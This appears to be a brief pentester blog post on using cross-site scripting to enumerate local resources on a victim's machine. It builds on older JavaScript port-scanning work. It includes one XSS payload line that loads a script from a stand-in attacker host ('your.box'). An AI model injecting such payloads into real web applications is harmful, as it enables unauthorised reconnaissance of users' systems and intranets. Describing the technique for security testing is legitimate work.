Local resource enumeration via XSS

Probably you all already know how to "Hack Intranet Websites from the Outside" (if not, google for Jeremiah Grossman and RSnake - you can start here - and read about some attacks from 2006 and 2007). ;) There you will find similar usage of JavaScript as you can find below:

During last webapp pentest I was asked to prepare some scenario of possible XSS exploitation. I decided to use an old technique (see Grossmann and RSnake ;)) related to "portscan in JS". My change was that I decided to check for local resources, not for open ports. Results below:

If you will use (as your XSS payload) something like:

<script src='http://your.box/getres.js'/></script>

or  you will just put the code in vulnerable form, you should be able to enumerate resources on remote host. You can of course extend this more and more... but I will let you do it as a homework ;)

Code is also available at my github.

Cheers!